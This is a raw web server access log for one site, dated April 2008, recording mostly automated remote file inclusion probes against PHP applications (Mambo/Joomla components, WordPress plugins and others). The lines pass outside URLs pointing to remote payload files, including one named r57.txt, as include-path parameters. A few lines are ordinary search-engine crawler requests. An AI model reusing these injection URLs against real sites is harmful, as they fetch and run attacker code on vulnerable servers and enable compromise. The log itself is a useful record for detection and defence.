89.108.93.123 - - [29/Apr/2008:11:28:19 -0700] "GET /logs/access_080218.log/convert/mvcw.php?step=1&vwar_root=http://computasiunair.com/paddy/mic22.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.64" "www.dmulk.com"
69.90.72.88 - - [29/Apr/2008:11:28:27 -0700] "GET /logs/access_080220.log//phpsecurityadmin/include/logout.php?PSA_PATH=http://cocreation.hk/id? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
210.113.203.55 - - [29/Apr/2008:11:28:33 -0700] "GET /logs/access_080329.log/bookmark4u/lostpasswd.php?env[include_prefix]=http://computasiunair.com/paddy/mic22.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
62.149.173.152 - - [29/Apr/2008:11:28:34 -0700] "GET /logs//nuke_path/htmltonuke.php?filnavn=http://www.studio-wave.com/concept/images/css.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
62.149.173.152 - - [29/Apr/2008:11:28:34 -0700] "GET //nuke_path/htmltonuke.php?filnavn=http://www.studio-wave.com/concept/images/css.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
70.87.154.155 - - [29/Apr/2008:11:29:51 -0700] "GET /logs/content/multithumb/multithumb?mosConfig_absolute_path=http://www.iammypersonalbest.com/oneadmin/linksdir/id2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
70.87.154.155 - - [29/Apr/2008:11:29:51 -0700] "GET /content/multithumb/multithumb?mosConfig_absolute_path=http://www.iammypersonalbest.com/oneadmin/linksdir/id2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
92.48.75.104 - - [29/Apr/2008:11:30:27 -0700] "GET /logs/administrator/components/com_peoplebook/param.peoplebook.php?mosConfig_absolute_path=http://www.stiri-mondene.com//id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
92.48.75.104 - - [29/Apr/2008:11:30:28 -0700] "GET /administrator/components/com_peoplebook/param.peoplebook.php?mosConfig_absolute_path=http://www.stiri-mondene.com//id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
72.29.81.233 - - [29/Apr/2008:11:30:55 -0700] "GET /logs/db.php?path_local=ftp://84.32.137.157/incoming/upload/trex/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
72.29.81.233 - - [29/Apr/2008:11:30:56 -0700] "GET /db.php?path_local=ftp://84.32.137.157/incoming/upload/trex/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
65.55.211.23 - - [29/Apr/2008:11:31:14 -0700] "GET /robots.txt HTTP/1.1" 404 275 "-" "msnbot/1.1 (+http://search.msn.com/msnbot.htm)" "www.dmulk.com"
65.55.211.23 - - [29/Apr/2008:11:31:14 -0700] "GET /funny/ HTTP/1.1" 200 808 "-" "msnbot/1.1 (+http://search.msn.com/msnbot.htm)" "www.dmulk.com"
195.74.37.170 - - [29/Apr/2008:11:31:55 -0700] "GET /logs/access_080228.log//index.php?option=com_mambots&Itemid=&mosConfig_absolute_path=http://h1.ripway.com/cicir0x/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
210.113.203.55 - - [29/Apr/2008:11:31:58 -0700] "GET /logs/access_080218.log/convert/mvcw.php?step=1&vwar_root=http://computasiunair.com/paddy/mic22.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
195.74.37.170 - - [29/Apr/2008:11:32:01 -0700] "GET //index.php?option=com_mambots&Itemid=&mosConfig_absolute_path=http://h1.ripway.com/cicir0x/id.txt? HTTP/1.1" 200 11606 "-" "libwww-perl/5.808" "www.dmulk.com"
195.74.37.170 - - [29/Apr/2008:11:32:01 -0700] "GET /logs//index.php?option=com_mambots&Itemid=&mosConfig_absolute_path=http://h1.ripway.com/cicir0x/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
195.110.147.194 - - [29/Apr/2008:11:32:05 -0700] "GET /logs/access_080308.log/index.php?redir=http://druidsutterance.net/templates/rt_technopia/css/cmdaff? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.dmulk.com"
89.107.184.106 - - [29/Apr/2008:11:32:09 -0700] "GET /logs/access_080329.log//index.php?option=com_dbquery&Itemid=&mosConfig_absolute_path=http://h1.ripway.com/cyber1212/plugin/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
195.74.37.170 - - [29/Apr/2008:11:32:23 -0700] "GET /logs/access_080229.log//index.php?option=com_mambots&Itemid=&mosConfig_absolute_path=http://h1.ripway.com/cicir0x/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
89.108.64.57 - - [29/Apr/2008:11:32:47 -0700] "GET /logs//components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.webhostmedic.com/p.c?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
89.108.64.57 - - [29/Apr/2008:11:32:48 -0700] "GET //components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.webhostmedic.com/p.c?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
69.90.72.88 - - [29/Apr/2008:11:33:18 -0700] "GET /logs/access_080223.log//include/monitoring/engine/MakeXML4statusCounter.php?fileOreonConf=http://cocreation.hk/id? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
62.84.188.7 - - [29/Apr/2008:11:34:25 -0700] "GET //index.php?option=com_magazine&Itemid=&mosConfig_absolute_path=http://www.motociclismo.pt/images/banners/canboy? HTTP/1.1" 200 11606 "-" "libwww-perl/5.805" "www.dmulk.com"
69.90.72.88 - - [29/Apr/2008:11:34:32 -0700] "GET /logs/access_080302.log//include/monitoring/engine/MakeXML4statusCounter.php?fileOreonConf=http://cocreation.hk/id? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
194.206.242.35 - - [29/Apr/2008:11:34:32 -0700] "GET /logs/includes/mailaccess/pop3.php?CONFIG[pear_dir]=http://www.loader.fr/mic22.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
194.206.242.35 - - [29/Apr/2008:11:34:33 -0700] "GET /includes/mailaccess/pop3.php?CONFIG[pear_dir]=http://www.loader.fr/mic22.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
81.176.77.163 - - [29/Apr/2008:11:34:38 -0700] "GET /logs/access_080228.log//index.php?option=com_mambowiki&Itemid=&mosConfig_absolute_path=http://h1.ripway.com/cicir0x/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
200.93.147.155 - - [29/Apr/2008:11:34:47 -0700] "GET //htdocs/wordpress/wp-login.php?dir=http://www.cdpm3.com/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 5.0; SunOS 5.9 sun4u; X11)" "www.dmulk.com"
211.115.110.89 - - [29/Apr/2008:11:34:55 -0700] "GET /logs/index.php?sayfa=http://fadhilla.com/program/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20060321 Firefox/2.0a1" "www.dmulk.com"
211.115.110.89 - - [29/Apr/2008:11:34:59 -0700] "GET /index.php?sayfa=http://fadhilla.com/program/test.txt? HTTP/1.1" 200 11606 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20060321 Firefox/2.0a1" "www.dmulk.com"
195.110.147.194 - - [29/Apr/2008:11:35:02 -0700] "GET /logs/access_080215.log/index.php?redir=http://druidsutterance.net/templates/rt_technopia/css/cmdaff? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.dmulk.com"
195.74.37.170 - - [29/Apr/2008:11:35:12 -0700] "GET /logs/access_080228.log//index.php?option=com_mambowiki&Itemid=&mosConfig_absolute_path=http://h1.ripway.com/cicir0x/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
200.93.147.155 - - [29/Apr/2008:11:35:17 -0700] "GET /logs//htdocs/wordpress/wp-login.php?dir=http://www.cdpm3.com/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 5.0; SunOS 5.9 sun4u; X11)" "www.dmulk.com"
200.93.147.155 - - [29/Apr/2008:11:35:17 -0700] "GET //tools/send_reminders.php?noSet=0&includedir=http://www.cdpm3.com/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 5.0; SunOS 5.9 sun4u; X11)" "www.dmulk.com"
62.76.116.20 - - [29/Apr/2008:11:35:25 -0700] "GET //index.php?option=com_dbquery&Itemid=&mosConfig_absolute_path=http://yoga0400.org/injek2.txt? HTTP/1.1" 200 11606 "-" "libwww-perl/5.810" "www.dmulk.com"
200.93.147.155 - - [29/Apr/2008:11:35:26 -0700] "GET /logs//tools/send_reminders.php?noSet=0&includedir=http://www.cdpm3.com/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 5.0; SunOS 5.9 sun4u; X11)" "www.dmulk.com"
206.168.112.10 - - [29/Apr/2008:11:35:56 -0700] "GET /logs/access_080315.log//common/db.php?commonpath=http://www.mizunobr.web.terra.com.br/sc.txt??????? HTTP/1.0" 404 275 "-" "libwww-perl/5.43" "www.dmulk.com"
206.168.112.10 - - [29/Apr/2008:11:35:56 -0700] "GET //common/db.php?commonpath=http://www.mizunobr.web.terra.com.br/sc.txt??????? HTTP/1.0" 404 275 "-" "libwww-perl/5.43" "www.dmulk.com"
206.168.112.10 - - [29/Apr/2008:11:35:56 -0700] "GET /logs//common/db.php?commonpath=http://www.mizunobr.web.terra.com.br/sc.txt??????? HTTP/1.0" 404 275 "-" "libwww-perl/5.43" "www.dmulk.com"
89.42.133.2 - - [29/Apr/2008:11:36:00 -0700] "GET /logs/access_080228.log//index.php?option=com_mambots&Itemid=&mosConfig_absolute_path=http://areairc.t35.com/new/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
89.42.133.2 - - [29/Apr/2008:11:36:05 -0700] "GET //index.php?option=com_mambots&Itemid=&mosConfig_absolute_path=http://areairc.t35.com/new/id.txt??? HTTP/1.1" 200 11606 "-" "libwww-perl/5.805" "www.dmulk.com"
89.42.133.2 - - [29/Apr/2008:11:36:06 -0700] "GET /logs//index.php?option=com_mambots&Itemid=&mosConfig_absolute_path=http://areairc.t35.com/new/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
77.221.130.3 - - [29/Apr/2008:11:36:12 -0700] "GET /logs/access.log//index.php?option=com_dbquery&Itemid=&mosConfig_absolute_path=http://kukekaw.fileave.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
77.221.130.3 - - [29/Apr/2008:11:36:12 -0700] "GET /logs//index.php?option=com_dbquery&Itemid=&mosConfig_absolute_path=http://kukekaw.fileave.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
81.176.77.163 - - [29/Apr/2008:11:36:14 -0700] "GET /logs/access_080228.log//index.php?option=com_mambots&Itemid=&mosConfig_absolute_path=http://h1.ripway.com/cicir0x/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
81.176.77.163 - - [29/Apr/2008:11:36:18 -0700] "GET //index.php?option=com_mambots&Itemid=&mosConfig_absolute_path=http://h1.ripway.com/cicir0x/id.txt? HTTP/1.1" 200 11606 "-" "libwww-perl/5.803" "www.dmulk.com"
81.176.77.163 - - [29/Apr/2008:11:36:19 -0700] "GET /logs//index.php?option=com_mambots&Itemid=&mosConfig_absolute_path=http://h1.ripway.com/cicir0x/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
89.42.133.2 - - [29/Apr/2008:11:36:30 -0700] "GET /logs/access_080229.log//index.php?option=com_mambots&Itemid=&mosConfig_absolute_path=http://areairc.t35.com/new/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
195.74.37.170 - - [29/Apr/2008:11:36:34 -0700] "GET /logs//includes/mailaccess/pop3.php?CONFIG[pear_dir]=http://h1.ripway.com/cicir0x/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
195.74.37.170 - - [29/Apr/2008:11:36:34 -0700] "GET //includes/mailaccess/pop3.php?CONFIG[pear_dir]=http://h1.ripway.com/cicir0x/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
81.176.77.163 - - [29/Apr/2008:11:36:47 -0700] "GET /logs/access_080229.log//index.php?option=com_mambots&Itemid=&mosConfig_absolute_path=http://h1.ripway.com/cicir0x/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
66.230.212.199 - - [29/Apr/2008:11:36:59 -0700] "GET /logs//index.php?option=com_dbquery&Itemid=&mosConfig_absolute_path=http://bajigur.net/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
66.230.212.199 - - [29/Apr/2008:11:37:02 -0700] "GET //index.php?option=com_dbquery&Itemid=&mosConfig_absolute_path=http://bajigur.net/safe.txt? HTTP/1.1" 200 11606 "-" "libwww-perl/5.808" "www.dmulk.com"
12.53.219.68 - - [29/Apr/2008:11:37:08 -0700] "GET /logs//index.php?option=com_mtree&Itemid=&mosConfig_absolute_path=http://www.i-promo.info/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20051219 SeaMonkey/1.0b" "www.dmulk.com"
12.53.219.68 - - [29/Apr/2008:11:37:18 -0700] "GET //index.php?option=com_mtree&Itemid=&mosConfig_absolute_path=http://www.i-promo.info/test.txt? HTTP/1.1" 200 11606 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20051219 SeaMonkey/1.0b" "www.dmulk.com"
210.127.253.161 - - [29/Apr/2008:11:37:41 -0700] "GET /logs/access_080313.log//include/monitoring/engine/MakeXML4statusCounter.php?fileOreonConf=http://unisel.t35.com/abe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
72.29.81.233 - - [29/Apr/2008:11:37:45 -0700] "GET /logs/access_080329.log/db.php?path_local=ftp://84.32.137.157/incoming/upload/trex/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
72.29.81.233 - - [29/Apr/2008:11:38:41 -0700] "GET /logs/access_080225.log/db.php?path_local=ftp://84.32.137.157/incoming/upload/trex/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
89.42.133.2 - - [29/Apr/2008:11:38:42 -0700] "GET /logs/access_080228.log//index.php?option=com_mambowiki&Itemid=&mosConfig_absolute_path=http://areairc.t35.com/new/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
62.111.134.12 - - [29/Apr/2008:11:39:13 -0700] "GET /logs//administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=http://togot.us/mini.htm? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
62.111.134.12 - - [29/Apr/2008:11:39:14 -0700] "GET //administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=http://togot.us/mini.htm? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
218.94.38.182 - - [29/Apr/2008:11:39:30 -0700] "GET /logs/access.log//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.cdpm3.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
74.55.6.34 - - [29/Apr/2008:11:40:01 -0700] "GET /logs/access_080122.log/wp-content/plugins/wordtube/wordtube-button.php?wpPATH=http://www.cnm.gob.pe/cnm/cache/tmp0/help01.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
74.55.6.34 - - [29/Apr/2008:11:40:01 -0700] "GET /wp-content/plugins/wordtube/wordtube-button.php?wpPATH=http://www.cnm.gob.pe/cnm/cache/tmp0/help01.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
74.55.6.34 - - [29/Apr/2008:11:40:01 -0700] "GET /logs/wp-content/plugins/wordtube/wordtube-button.php?wpPATH=http://www.cnm.gob.pe/cnm/cache/tmp0/help01.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
74.55.6.34 - - [29/Apr/2008:11:40:06 -0700] "GET /logs/access_080128.log/wp-content/plugins/wordtube/wordtube-button.php?wpPATH=http://www.cnm.gob.pe/cnm/cache/tmp0/help01.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
77.221.130.3 - - [29/Apr/2008:11:40:53 -0700] "GET /logs/access_080329.log//index.php?option=com_dbquery&Itemid=&mosConfig_absolute_path=http://kukekaw.fileave.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
89.108.66.127 - - [29/Apr/2008:11:41:08 -0700] "GET /logs/access_080218.log//inc/cmses/aedatingCMS.php?dir%5Binc%5D=http://h1.ripway.com/cyber1212/plugin/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
89.108.66.127 - - [29/Apr/2008:11:41:08 -0700] "GET //inc/cmses/aedatingCMS.php?dir%5Binc%5D=http://h1.ripway.com/cyber1212/plugin/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
89.108.66.127 - - [29/Apr/2008:11:41:09 -0700] "GET /logs//inc/cmses/aedatingCMS.php?dir%5Binc%5D=http://h1.ripway.com/cyber1212/plugin/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
12.53.219.68 - - [29/Apr/2008:11:41:19 -0700] "GET /logs//tourney/index.php?page=http://www.i-promo.info/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20051219 SeaMonkey/1.0b" "www.dmulk.com"
12.53.219.68 - - [29/Apr/2008:11:41:24 -0700] "GET //tourney/index.php?page=http://www.i-promo.info/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20051219 SeaMonkey/1.0b" "www.dmulk.com"
206.168.112.10 - - [29/Apr/2008:11:41:29 -0700] "GET /logs/access_080224.log//Neos_Chronos/header.php?base_folder=http://www.mizunobr.web.terra.com.br/sc.txt??????? HTTP/1.0" 404 275 "-" "libwww-perl/5.43" "www.dmulk.com"
206.168.112.10 - - [29/Apr/2008:11:41:30 -0700] "GET //Neos_Chronos/header.php?base_folder=http://www.mizunobr.web.terra.com.br/sc.txt??????? HTTP/1.0" 404 275 "-" "libwww-perl/5.43" "www.dmulk.com"
206.168.112.10 - - [29/Apr/2008:11:41:30 -0700] "GET /logs//Neos_Chronos/header.php?base_folder=http://www.mizunobr.web.terra.com.br/sc.txt??????? HTTP/1.0" 404 275 "-" "libwww-perl/5.43" "www.dmulk.com"
62.111.134.12 - - [29/Apr/2008:11:41:35 -0700] "GET /logs/access_080215.log//infusions/stats_info_panel/log.inc.php?gethostbyaddr=http://togot.us/mini.htm? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
62.111.134.12 - - [29/Apr/2008:11:41:35 -0700] "GET //infusions/stats_info_panel/log.inc.php?gethostbyaddr=http://togot.us/mini.htm? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
62.111.134.12 - - [29/Apr/2008:11:41:36 -0700] "GET /logs//infusions/stats_info_panel/log.inc.php?gethostbyaddr=http://togot.us/mini.htm? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
206.168.112.10 - - [29/Apr/2008:11:41:45 -0700] "GET /logs/access.log//agendax/addevent.inc.php?agendax_path=http://www.mizunobr.web.terra.com.br/sc.txt??????? HTTP/1.0" 404 275 "-" "libwww-perl/5.43" "www.dmulk.com"
206.168.112.10 - - [29/Apr/2008:11:41:45 -0700] "GET //agendax/addevent.inc.php?agendax_path=http://www.mizunobr.web.terra.com.br/sc.txt??????? HTTP/1.0" 404 275 "-" "libwww-perl/5.43" "www.dmulk.com"
206.168.112.10 - - [29/Apr/2008:11:41:45 -0700] "GET /logs//agendax/addevent.inc.php?agendax_path=http://www.mizunobr.web.terra.com.br/sc.txt??????? HTTP/1.0" 404 275 "-" "libwww-perl/5.43" "www.dmulk.com"
74.6.19.189 - - [29/Apr/2008:11:41:57 -0700] "GET /robots.txt HTTP/1.0" 404 275 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
72.30.216.107 - - [29/Apr/2008:11:41:58 -0700] "GET /logs/access.log HTTP/1.0" 200 417094 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
206.168.112.10 - - [29/Apr/2008:11:42:01 -0700] "GET /logs/access_071220.log//Neos_Chronos/header.php?base_folder=http://www.mizunobr.web.terra.com.br/sc.txt??????? HTTP/1.0" 404 275 "-" "libwww-perl/5.43" "www.dmulk.com"
64.246.36.8 - - [29/Apr/2008:11:42:12 -0700] "GET /logs//includes/db_connect.php?baseDir=http://www.venezia2.it/coges.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
64.246.36.8 - - [29/Apr/2008:11:42:14 -0700] "GET //includes/db_connect.php?baseDir=http://www.venezia2.it/coges.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
206.168.112.10 - - [29/Apr/2008:11:42:19 -0700] "GET /logs/access_080218.log//administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=http://www.mizunobr.web.terra.com.br/sc.txt??????? HTTP/1.0" 404 275 "-" "libwww-perl/5.43" "www.dmulk.com"
206.168.112.10 - - [29/Apr/2008:11:42:20 -0700] "GET //administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=http://www.mizunobr.web.terra.com.br/sc.txt??????? HTTP/1.0" 404 275 "-" "libwww-perl/5.43" "www.dmulk.com"
206.168.112.10 - - [29/Apr/2008:11:42:20 -0700] "GET /logs//administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=http://www.mizunobr.web.terra.com.br/sc.txt??????? HTTP/1.0" 404 275 "-" "libwww-perl/5.43" "www.dmulk.com"
70.86.49.98 - - [29/Apr/2008:11:42:29 -0700] "GET /wp-content/plugins/wordtube/wordtube-button.php?wpPATH=http://www.freewebtown.com/amir5/idat.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows CE 4.21; rv:1.8b4) Gecko/20050720 Minimo/0.007" "www.dmulk.com"
70.86.49.98 - - [29/Apr/2008:11:42:29 -0700] "GET /logs/wp-content/plugins/wordtube/wordtube-button.php?wpPATH=http://www.freewebtown.com/amir5/idat.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows CE 4.21; rv:1.8b4) Gecko/20050720 Minimo/0.007" "www.dmulk.com"
206.168.112.10 - - [29/Apr/2008:11:42:31 -0700] "GET /logs/access_080201.log//administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=http://www.mizunobr.web.terra.com.br/sc.txt??????? HTTP/1.0" 404 275 "-" "libwww-perl/5.43" "www.dmulk.com"
208.100.1.157 - - [29/Apr/2008:11:43:01 -0700] "GET /logs/access_080122.log/wp-content/plugins/wordtube/wordtube-button.php?wpPATH=http://h1.ripway.com/cyber1212/plugin/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
208.100.1.157 - - [29/Apr/2008:11:43:01 -0700] "GET /wp-content/plugins/wordtube/wordtube-button.php?wpPATH=http://h1.ripway.com/cyber1212/plugin/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
208.100.1.157 - - [29/Apr/2008:11:43:01 -0700] "GET /logs/wp-content/plugins/wordtube/wordtube-button.php?wpPATH=http://h1.ripway.com/cyber1212/plugin/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
208.100.1.157 - - [29/Apr/2008:11:43:08 -0700] "GET /logs/access_080128.log/wp-content/plugins/wordtube/wordtube-button.php?wpPATH=http://h1.ripway.com/cyber1212/plugin/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
201.130.79.61 - - [29/Apr/2008:11:43:16 -0700] "GET /logs//main.php?sayfa=http://computasiunair.com/paddy/alba.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
201.130.79.61 - - [29/Apr/2008:11:43:16 -0700] "GET //main.php?sayfa=http://computasiunair.com/paddy/alba.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
65.55.211.29 - - [29/Apr/2008:11:43:26 -0700] "GET /robots.txt HTTP/1.1" 404 275 "-" "msnbot/1.1 (+http://search.msn.com/msnbot.htm)" "www.dmulk.com"
65.55.211.29 - - [29/Apr/2008:11:43:27 -0700] "GET /minamijewelry/dream.psd HTTP/1.1" 200 109304 "-" "msnbot/1.1 (+http://search.msn.com/msnbot.htm)" "www.dmulk.com"
201.16.17.221 - - [29/Apr/2008:11:43:29 -0700] "GET /logs/access_080201.log//modules/vwar/admin/admin.php?vwar_root=http://netbr.org/documents/r57.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
201.16.17.221 - - [29/Apr/2008:11:43:30 -0700] "GET /logs//modules/vwar/admin/admin.php?vwar_root=http://netbr.org/documents/r57.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
65.55.211.26 - - [29/Apr/2008:11:43:40 -0700] "GET /robots.txt HTTP/1.1" 404 275 "-" "msnbot/1.1 (+http://search.msn.com/msnbot.htm)" "www.dmulk.com"
65.55.211.26 - - [29/Apr/2008:11:43:40 -0700] "GET /minamijewelry/flower.psd HTTP/1.1" 200 109558 "-" "msnbot/1.1 (+http://search.msn.com/msnbot.htm)" "www.dmulk.com"
85.190.1.171 - - [29/Apr/2008:11:43:40 -0700] "GET /logs/access_080201.log/administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://www.venezia2.it/coges.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
85.190.1.171 - - [29/Apr/2008:11:43:41 -0700] "GET /administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://www.venezia2.it/coges.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
85.190.1.171 - - [29/Apr/2008:11:43:41 -0700] "GET /logs/administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://www.venezia2.it/coges.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
89.218.85.18 - - [29/Apr/2008:11:43:44 -0700] "GET /logs/access.log/administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://www.venezia2.it/coges.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
89.218.85.18 - - [29/Apr/2008:11:43:44 -0700] "GET /logs/access.log/administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://www.venezia2.it/coges.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
89.218.85.18 - - [29/Apr/2008:11:43:44 -0700] "GET /administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://www.venezia2.it/coges.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
89.218.85.18 - - [29/Apr/2008:11:43:44 -0700] "GET /administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://www.venezia2.it/coges.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
89.218.85.18 - - [29/Apr/2008:11:43:45 -0700] "GET /logs/administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://www.venezia2.it/coges.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
89.218.85.18 - - [29/Apr/2008:11:43:45 -0700] "GET /logs/administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://www.venezia2.it/coges.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
62.111.134.12 - - [29/Apr/2008:11:43:55 -0700] "GET /logs/access_080308.log//administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=http://togot.us/mini.htm? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
62.111.134.12 - - [29/Apr/2008:11:43:56 -0700] "GET /logs/access_080321.log//administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=http://togot.us/mini.htm? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
